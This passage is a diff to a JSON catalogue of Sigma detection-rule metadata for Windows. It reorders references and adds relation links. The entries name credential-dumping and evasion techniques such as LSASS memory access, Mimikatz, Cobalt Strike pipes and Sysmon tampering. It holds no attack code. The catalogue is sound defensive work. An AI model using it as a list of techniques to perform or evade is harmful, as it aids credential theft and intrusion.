"SVCHOST Credential Dump" }, @@ -2488,6 +3163,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c", "value": "UAC Bypass Using WOW64 Logger DLL Hijack" }, @@ -2504,10 +3188,10 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.001/T1003.001.md", - "https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html", "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.001/T1003.001.md", "https://research.splunk.com/endpoint/windows_possible_credential_dumping/", + "https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump.yml" ], "tags": [ @@ -2516,6 +3200,15 @@ "attack.s0002" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", "value": "LSASS Memory Dump" }, @@ -2532,9 +3225,9 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml" ], @@ -2545,6 +3238,15 @@ "car.2019-04-004" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "32d0d3e2-e58d-4d41-926b-18b520b2b32d", "value": "Credential Dumping Tools Accessing LSASS Memory" }, @@ -2561,10 +3263,10 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml" ], @@ -2574,6 +3276,15 @@ "attack.s0002" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "678dfc63-fefb-47a5-a04c-26bcf8cc9f65", "value": "Rare GrantedAccess Flags on LSASS Access" }, @@ -2590,10 +3301,10 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_proc_access_lsass.yml" ], @@ -2603,6 +3314,15 @@ "attack.s0002" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a18dd26b-6450-46de-8c91-9659150cf088", "value": "Suspicious GrantedAccess Flags on LSASS Access" }, @@ -2627,6 +3347,15 @@ "attack.t1106" ] }, + "related": [ + { + "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3f3f3506-1895-401b-9cc3-e86b16e630d0", "value": "Direct Syscall of NtOpenProcess" }, @@ -2654,6 +3383,40 @@ "uuid": "250ae82f-736e-4844-a68b-0b5e8cc887da", "value": "Potential Shellcode Injection" }, + { + "description": "Detects potential NT API stub patching as seen used by the project PatchingAPI", + "meta": { + "author": "frack113", + "creation_date": "2023/01/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_access_win_invoke_patchingapi.yml", + "level": "medium", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://github.com/D1rkMtr/UnhookingPatch", + "https://twitter.com/D1rkMtr/status/1611471891193298944?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_invoke_patchingapi.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ] + }, + "related": [ + { + "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "b916cba1-b38a-42da-9223-17114d846fd6", + "value": "Potential NT API Stub Patching" + }, { "description": "Detects the process injection of a LittleCorporal generated Maldoc.", "meta": { @@ -2676,6 +3439,22 @@ "attack.t1055.003" ] }, + "related": [ + { + "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "41d9846c-f6af-4302-a654-24bba2729bc6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac", "value": "LittleCorporal Generated Maldoc Injection" }, @@ -2702,6 +3481,22 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", "value": "HandleKatz Duplicating LSASS Handle" }, @@ -2728,6 +3523,15 @@ "attack.s0002" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3", "value": "LSASS Memory Access by Tool Named Dump" }, @@ -2744,9 +3548,9 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://github.com/codewhitesec/SysmonEnte/blob/main/screens/1.png", - "https://github.com/codewhitesec/SysmonEnte/", "https://codewhitesec.blogspot.com/2022/09/attacks-on-sysmon-revisited-sysmonente.html", + "https://github.com/codewhitesec/SysmonEnte/", + "https://github.com/codewhitesec/SysmonEnte/blob/main/screens/1.png", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_hack_sysmonente.yml" ], "tags": [ @@ -2754,6 +3558,15 @@ "attack.t1562.002" ] }, + "related": [ + { + "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", "value": "SysmonEnte Usage" }, @@ -2781,6 +3594,15 @@ "attack.t1562.001" ] }, + "related": [ + { + "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "09706624-b7f6-455d-9d02-adee024cee1d", "value": "CobaltStrike BOF Injection Pattern" }, @@ -2797,9 +3619,9 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ + "https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html", "https://twitter.com/SBousseaden/status/1541920424635912196", "https://github.com/elastic/detection-rules/blob/2bc1795f3d7bcc3946452eb4f07ae799a756d94e/rules/windows/credential_access_lsass_handle_via_malseclogon.toml", - "https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_seclogon.yml" ], "tags": [ @@ -2807,6 +3629,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "472159c5-31b9-4f56-b794-b766faa8b0a7", "value": "Suspicious LSASS Access Via MalSecLogon" }, @@ -2879,6 +3710,15 @@ "attack.t1055.012" ] }, + "related": [ + { + "dest-uuid": "b200542e-e877-4395-875b-cf1a44537ca4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c4b890e5-8d8c-4496-8c66-c805753817cd", "value": "Sysmon Process Hollowing Detection" }, @@ -2895,8 +3735,8 @@ "logsource.category": "sysmon_error", "logsource.product": "windows", "refs": [ - "https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification_error.yml" ], "tags": [ @@ -2904,6 +3744,15 @@ "attack.t1564" ] }, + "related": [ + { + "dest-uuid": "22905430-4901-4c2a-84f6-98243cb173f8", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "815cd91b-7dbc-4247-841a-d7dd1392b0a8", "value": "Sysmon Configuration Error" }, @@ -2920,8 +3769,8 @@ "logsource.category": "sysmon_status", "logsource.product": "windows", "refs": [ - "https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification_status.yml" ], "tags": [ @@ -2929,6 +3778,15 @@ "attack.t1564" ] }, + "related": [ + { + "dest-uuid": "22905430-4901-4c2a-84f6-98243cb173f8", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1f2b5353-573f-4880-8e33-7d04dcf97744", "value": "Sysmon Configuration Modification" }, @@ -2945,8 +3803,8 @@ "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ - "https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752", "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", + "https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml" ], "tags": [ @@ -2971,8 +3829,8 @@ "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ - "https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752", "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", + "https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_cobaltstrike_re.yml" ], "tags": [ @@ -3008,6 +3866,36 @@ "attack.t1003.005" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1ecfdab8-7d59-4c98-95d4-dc41970f57fc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "6add2ab5-2711-4e9d-87c8-7a0be8531530", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "961d0ba2-3eea-4303-a930-2cf78bbfcc5e", "value": "Cred Dump-Tools Named Pipes" }, @@ -3024,11 +3912,11 @@ "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ - "https://github.com/SigmaHQ/sigma/issues/253", - "https://twitter.com/d4rksystem/status/1357010969264873472", - "https://redcanary.com/threat-detection-report/threats/cobalt-strike/", "https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis/", "https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/", + "https://github.com/SigmaHQ/sigma/issues/253", + "https://redcanary.com/threat-detection-report/threats/cobalt-strike/", + "https://twitter.com/d4rksystem/status/1357010969264873472", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_cobaltstrike.yml" ], "tags": [ @@ -3063,6 +3951,15 @@ "attack.t1106" ] }, + "related": [ + { + "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "739915e4-1e70-4778-8b8a-17db02f66db1", "value": "Turla Group Named Pipes" }, @@ -3087,6 +3984,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "58cb02d5-78ce-4692-b3e1-dce850aae41a", "value": "Alternate PowerShell Hosts Pipe" }, @@ -3134,6 +4040,15 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f6451de4-df0a-41fa-8d72-b39f54a08db5", "value": "PAExec Default Named Pipe" }, @@ -3158,6 +4073,15 @@ "attack.execution" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", "value": "WMI Event Consumer Created Named Pipe" }, @@ -3182,6 +4106,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ac7102b4-9e1e-4802-9b4f-17c5524c015c", "value": "PowerShell Execution Via Named Pipe" }, @@ -3208,6 +4141,15 @@ "attack.s0029" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "41504465-5e3a-4a5b-a5b4-2a0baadd4463", "value": "PsExec Tool Execution From Suspicious Locations - PipeName" }, @@ -3260,6 +4202,15 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9e77ed63-2ecf-4c7b-b09d-640834882028", "value": "PsExec Pipes Artifacts" }, @@ -3276,18 +4227,18 @@ "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ - "https://www.us-cert.gov/ncas/alerts/TA17-117A", - "https://thedfirreport.com/2020/06/21/snatch-ransomware/", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a", "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/", + "https://www.us-cert.gov/ncas/alerts/TA17-117A", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a", + "https://securelist.com/faq-the-projectsauron-apt/75533/", + "https://github.com/RiccardoAncarani/LiquidSnake", "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf", + "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity", + "https://thedfirreport.com/2020/06/21/snatch-ransomware/", "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", "https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/", - "https://securelist.com/faq-the-projectsauron-apt/75533/", - "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/", - "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", - "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity", - "https://github.com/RiccardoAncarani/LiquidSnake", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_namedpipes.yml" ], "tags": [ @@ -3322,6 +4273,15 @@ "attack.s0029" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f3f3a972-f982-40ad-b63c-bca6afdfad7c", "value": "PsExec Default Named Pipe" }, @@ -3338,9 +4298,9 @@ "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ - "https://o365blog.com/post/adfs/", "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/ADFSDBNamedPipeConnection.yaml", "https://github.com/Azure/SimuLand", + "https://o365blog.com/post/adfs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_adfs_namedpipe_connection.yml" ], "tags": [ @@ -3348,6 +4308,15 @@ "attack.t1005" ] }, + "related": [ + { + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", "value": "ADFS Database Named Pipe Connection" }, @@ -3374,6 +4343,22 @@ "attack.t1134.001" ] }, + "related": [ + { + "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "86850eff-2729-40c3-b85e-c4af26da4a2d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a", "value": "Koh Default Named Pipes" }, @@ -3407,6 +4392,36 @@ "attack.t1003.006" ] }, + "related": [ + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1ecfdab8-7d59-4c98-95d4-dc41970f57fc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f303a39a-6255-4b89-aecc-18c4d8ca7163", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "06d71506-7beb-4f22-8888-e2e5e2ca7fd8", "value": "Mimikatz Use" }, @@ -3546,6 +4561,15 @@ "attack.t1136.001" ] }, + "related": [ + { + "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "66b6be3d-55d0-4f47-9855-d69df21740ea", "value": "Local User Creation" }, @@ -3572,6 +4596,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7a922f1b-2635-4d6c-91ef-af228b198ad3", "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - Security" }, @@ -3622,6 +4655,15 @@ "attack.t1134.005" ] }, + "related": [ + { + "dest-uuid": "b7dc639b-24cd-482d-a7f1-8897eda21023", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2632954e-db1c-49cb-9936-67d1ef1d17d2", "value": "Addition of SID History to Active Directory Object" }, @@ -3678,6 +4720,15 @@ "car.2016-04-002" ] }, + "related": [ + { + "dest-uuid": "6495ae23-3ab4-43c5-a94f-5638a2c31fd2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", "value": "Security Eventlog Cleared" }, @@ -3695,8 +4746,8 @@ "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore", - "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages", "https://twitter.com/MsftSecIntel/status/1257324139515269121", + "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_iso_mount.yml" ], "tags": [ @@ -3729,6 +4780,15 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c8b00925-926c-47e3-beea-298fd563728e", "value": "Remote Access Tool Services Have Been Installed - Security" }, @@ -3755,6 +4815,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", "value": "Invoke-Obfuscation Via Use MSHTA - Security" }, @@ -3771,8 +4840,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_lsass_dump_generic.yml" ], "tags": [ @@ -3781,6 +4850,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", "value": "Generic Password Dumper Activity on LSASS" }, @@ -3797,8 +4875,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6423", "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6423", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_device_installation_blocked.yml" ], "tags": "No established tags" @@ -3843,8 +4921,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4964", "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4964", "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4672", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_admin_logon.yml" ], @@ -3895,8 +4973,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://attack.mitre.org/software/S0359/", "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/nltest.htm", + "https://attack.mitre.org/software/S0359/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_lolbas_execution_of_nltest.yml" ], "tags": [ @@ -3906,6 +4984,15 @@ "attack.t1016" ] }, + "related": [ + { + "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "eeb66bbb-3dde-4582-815a-584aee9fe6d1", "value": "Correct Execution of Nltest.exe" }, @@ -3947,8 +5034,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", "https://twitter.com/mattifestation/status/899646620148539397", + "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_wmi_persistence.yml" ], "tags": [ @@ -3957,6 +5044,15 @@ "attack.t1546.003" ] }, + "related": [ + { + "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f033f3f3-fd24-4995-97d8-a3bb17550a88", "value": "WMI Persistence - Security" }, @@ -3994,8 +5090,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/menasec1/status/1106899890377052160", "https://www.secureworks.com/blog/ransomware-as-a-distraction", + "https://twitter.com/menasec1/status/1106899890377052160", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_gpo_scheduledtasks.yml" ], "tags": [ @@ -4004,6 +5100,15 @@ "attack.t1053.005" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a8f29a7b-b137-4446-80a0-b804272f3da2", "value": "Persistence and Execution at Scale via GPO Scheduled Task" }, @@ -4123,10 +5228,10 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624", - "https://github.com/staaldraad/go-ntlm/blob/cd032d41aa8ce5751c07cb7945400c0f5c81e2eb/ntlm/ntlmv1.go#L427", - "https://github.com/sensepost/ruler", "https://github.com/sensepost/ruler/issues/47", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624", + "https://github.com/sensepost/ruler", + "https://github.com/staaldraad/go-ntlm/blob/cd032d41aa8ce5751c07cb7945400c0f5c81e2eb/ntlm/ntlmv1.go#L427", "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4776", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ruler.yml" ], @@ -4139,6 +5244,22 @@ "attack.t1550.002" ] }, + "related": [ + { + "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", + "tags": [ + 